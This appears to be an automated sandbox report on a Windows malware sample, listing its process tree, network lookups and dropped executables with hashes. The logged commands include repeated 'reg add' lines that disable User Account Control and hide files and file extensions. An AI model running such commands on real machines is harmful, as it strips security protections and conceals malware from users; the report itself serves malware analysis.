cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JWAUQUMQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgokYMsw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ckgUkUAo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iSMAIoUQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KGssggMU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSEcooIw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ngMcwYkY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LmIAQssU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eYwAYUoM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KUAowgcA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cskMoUwc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eKIsQUsM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GsswQMMs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lWEUIEkM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HwwEYYoM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\ProgramData\waoYUQws\rgQoYAEU.exe
"C:\ProgramData\waoYUQws\rgQoYAEU.exe"
C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe
"C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| IE | 51.104.136.2:443 | | tcp |
| IE | 51.104.136.2:443 | | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
memory/1508-0-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2984-17-0x0000000000400000-0x000000000046E000-memory.dmp
memory/1776-12-0x0000000000400000-0x000000000046E000-memory.dmp
memory/5040-31-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2472-42-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-55-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1616-67-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3228-92-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-105-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1696-116-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1776-118-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4860-143-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3096-156-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3244-169-0x0000000000400000-0x000000000047A000-memory.dmp
memory/5040-233-0x0000000000400000-0x000000000047A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sMUA.exe
| MD5 | a1e1efe06ce1b17c9c05f50254aa4d5f |
| SHA1 | b9a1db0a611fc6f40c83a10410c5e8b6e65c36e7 |
| SHA256 | ebfd009694f91dce05b9b590bc3a79ea01c6718bcaf2f8e4a23b2699c2c039ff |
| SHA512 | 1e2d3a40e41e8a8b82cd1251c6885d23ac75893fb93f6d43088567b7cdfac4ae8e503d674dd104aa86f3605ddd168ce5552e2e63a3c62c5b543998ea005d6922 |
memory/2284-906-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-928-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-936-0x0000000000400000-0x000000000047A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QwUk.exe
| MD5 | b0e6148e9d6eafc7e9781fdbb64ab7b8 |
| SHA1 | b356f7813411cf992d90760ac46ab5eafdaa2430 |
| SHA256 | 0ee91888327ed8e394c9cfcfffe67ebdb011421fe2143dd077c9441eeebb3b4f |
| SHA512 | f0ca8962106654ddb5756d3b97e3185fe42800876a3b350a5824f8e08358a28a833ac9646f6ce46cfc2c44ec92b589f27818416663610eb4b26e10e707623f1b |
C:\Users\Admin\AppData\Local\Temp\ugwO.exe
| MD5 | 2483cbe4055fc4248ccd9715fdf1b5fe |
| SHA1 | c692802da7ab05dbb6a8c3a4c95f9735d301568e |
| SHA256 | 26c27a97cfd57964a0b0334cf9912a822e39eaa5b5dabb0d8692f8adfa0ceb42 |
| SHA512 | a1fc49674e2452cc4ea5264b246288266e9390453dd1990da269bdc0110857931475e4afe48181b84dcfe7a606672b885f8702b1a439b1ddd77ed3aea2f0257d |
C:\Users\Admin\AppData\Local\Temp\oAow.exe
| MD5 | 97d92aae83e9fbfab4b49df18218ba79 |
| SHA1 | 0ecd83c01ffbb6fd14541fce8baa91428325a8c0 |
| SHA256 | 233c9a49c5db666894d290ed428e025bf700e3e010db1e1f72947780fbd6e14c |
| SHA512 | f21055eebcfb3f8305a6c1ea9b40353949bdc3fd6e7138730b99737b3f5bf22c5e80c41ec737028c5aff8d999b9572f4bff7301f51c218206a5991cd47d7a9bd |
C:\Users\Admin\AppData\Local\Temp\eswS.exe
| MD5 | eb2debbedf4594408be9eb907a619921 |
| SHA1 | 5965350674a165ca9f25b476ba931a5ed0140a0c |
| SHA256 | 8d257b14e00edcef03b1dd2b24b3c62d4d5431786f641b0111183c7e8bc8ccc3 |
| SHA512 | 9d5d51c6b374dc7147e7afd98066b24acae8f402c9d42168176f116602d449bafe811605db732b8abedab76e222ae014fac4b9ee800705a3b23cb2bd35c60f6c |
C:\Users\Admin\AppData\Local\Temp\kkQE.exe
| MD5 | 2b782a0a76110d1c2e5c947910afebb2 |
| SHA1 | fbbd8fdf2de66568a8b5688287d500734b3d16e1 |
| SHA256 | d9a2b9d50d404e301209898f9fa369bb1098d0be53581578635da28310376c46 |
| SHA512 | c19081826af35e3a6a80c7e39b410ae24c93e834f6ff8a2f409a47303133de44859564eb2c14d257354ad6e22d5ff972bba00f9b37a80087d20a7d631dbc6d13 |
C:\Users\Admin\AppData\Local\Temp\UAEk.exe
| MD5 | 7b396f4957ea94b0802e45ef324dafc6 |
| SHA1 | f1dcdad58905941e6e097375268f55e741fe85bb |
| SHA256 | 4f3ffefbcf41b1ce354cd0e1588176f04a24aa300deb68f00c7c73b49cd3b99a |
| SHA512 | 97fb4698c869814d5fb4cb7f510163150deb54ea4bf40dd928c5be0b1eb96ab4b99a96d4c67a04a22bf4e5d528523ac7b0f6542fde2174dc9a2a13f799d8ce42 |
C:\Users\Admin\AppData\Local\Temp\aEkC.exe
| MD5 | fc31653274322f1e03e386a5139722be |
| SHA1 | 103bf9f8805f98ed93c5eeaf4fb6887ec8bf2b21 |
| SHA256 | 83a3af8a7f354f7b50bffb0b6a95175749292ae4bd4d4d4401d67fa698d8accd |
| SHA512 | bffcfa0549cdc4b6da6cf89f7a8837890d29991b3f92a34f7c3ac9835a5f2a1db1c8f9e39d22440431a2aa6ec37c80a30f54c55b963493cd5bfebcbc1cde4b4f |
C:\Users\Admin\AppData\Local\Temp\WUgk.exe
| MD5 | 4439f5fa24b89be6b733ad989414cc49 |
| SHA1 | 72e4475de7647bc0829b96401eff32c33292b337 |
| SHA256 | 7548c1d52f5236587d8db7a80e4410c151162b51c974f017b676416996e65757 |
| SHA512 | 41b508dc39d42218aba185b607ab28bdd61cf53a1f8c9e6778d8f839364a2723dc3c41b200c30cf517fc592c0708fecde9f1b9ad178cc0f73cc2cd081125176c |
C:\Users\Admin\AppData\Local\Temp\eMgs.exe
| MD5 | 1146193e3343f0d005ad2c62daffe8ec |
| SHA1 | 77d16a939854cd0d9d726ff7cc67a466e56adf3b |
| SHA256 | 601c2966adfef1668fe43c9b5cc0638bdd0d989f837fb30eee4bd07ca26eeed2 |
| SHA512 | 6babfcb2bf8774e2d3189d65ce2b9f5140aa0a866e546ea258073fe7bb57d631977b54d31bf06fda5e6f4da41c3b80b84879bccf13740ea192d3fb0d6fb067e2 |
C:\Users\Admin\AppData\Local\Temp\UAsw.exe
| MD5 | 04af86dd79bbea4a325dcb31be56a0e9 |
| SHA1 | a340799c073b148751c26b6b1627eb92ec456b29 |
| SHA256 | 4ee265d1c7823cbf8f32d93613234d6bf75eb694a80619ca6c854b790dcbed0f |
| SHA512 | c972f83295af0792b0cb87a0b6b030bde0436c970b79a5f7161f3569ce46b11a2bed4ddf964f8bde1d9078331f55a6389591b11396bcf7eac0d828c7a8c5d852 |
C:\Users\Admin\AppData\Local\Temp\oosM.exe
| MD5 | 7b9eac56907ea13f01d2d7d9f2895fe0 |
| SHA1 | f2c4f9c3d9422ff3e43582fdd15511322e3a3bf9 |
| SHA256 | 2d16573516fa082ded0d359ef835d3e6858ff237bf157fb1af3b5b54a9d0024b |
| SHA512 | 68b607ed25e6fc08d0199ac24d3b4e443844037fe84a93e3e6e9aa8a2e8f0244b017aefcb61d6b08560bdc6df4d4ebe6aa56ce5ac4ffb021a1322e76969c90dc |
C:\Users\Admin\AppData\Local\Temp\sAYm.exe
| MD5 | 697f6c8980cf8c9d617a63ac43f8a8e7 |
| SHA1 | e7b5ddb5e2774171b5203877445c6f0c80e9d615 |
| SHA256 | eafbc43b45d8fe095bb2c19b0b640a2e229eb6515c8ed2e8dd9ad0109d01fc27 |
| SHA512 | 5f4bf7e50d83e64ebb7f41452196269c9ef5c7bf0e5f57083c1db8c4fc7fd1e0adfbbd15ec0e6eb82f831d1ab47e02b14a0c7bafab569453ba903825f5478352 |
C:\Users\Admin\AppData\Local\Temp\ikks.ico
| MD5 | f31b7f660ecbc5e170657187cedd7942 |
| SHA1 | 42f5efe966968c2b1f92fadd7c85863956014fb4 |
| SHA256 | 684e75b6fdb9a7203e03c630a66a3710ace32aa78581311ba38e3f26737feae6 |
| SHA512 | 62787378cea556d2f13cd567ae8407a596139943af4405e8def302d62f64e19edb258dce44429162ac78b7cfc2260915c93ff6b114b0f910d8d64bf61bdd0462 |
C:\Users\Admin\AppData\Local\Temp\goQi.exe
| MD5 | 2910a7a1d3613d068450628aafb598b0 |
| SHA1 | d97eadd1ca9865e6dc745108150ff469c4b5084a |
| SHA256 | d6049dcad025aa5953a16b8aff1770c4045334ffd1b0a7da389542707292ceb8 |
| SHA512 | 3e4fb26890089415b33c9483ffabdebdcae98f267d00bccab4cbb1c593faa2e79eb8d109c981efe6fbf08b91115baf003cd94e5d94ed5da5b378e2375053761b |
C:\Users\Admin\AppData\Local\Temp\AAcS.exe
| MD5 | 56de12c255876de3685003f8b2be602c |
| SHA1 | 2e9203e7452d58e79c3cd13c75e44cf7d035613d |
| SHA256 | d6ba0e3585f0425025b0b5958636a8dd82a95e8eb61ed7e8ea47ddc33a7d57ed |
| SHA512 | 01508eb0fa1753de575f83d8f9b9556a2ef7b662bb75878e3f0252fd970ab8be2f4620b8c0ca017f1d0fcffb796a50b77482ce73bc5f701cde7a99acb54b88bc |
C:\Users\Admin\AppData\Local\Temp\gAEu.exe
| MD5 | fb6c0d2b37e52225dbb9bf9d59c8776a |
| SHA1 | 6281cfa0bad4dcedcb7d867028fdf70cc2906049 |
| SHA256 | 6ac3f642be7e4629e1a3a394f1e1d1ff37b2ec2cbf1c740eea9255da863fcd2f |
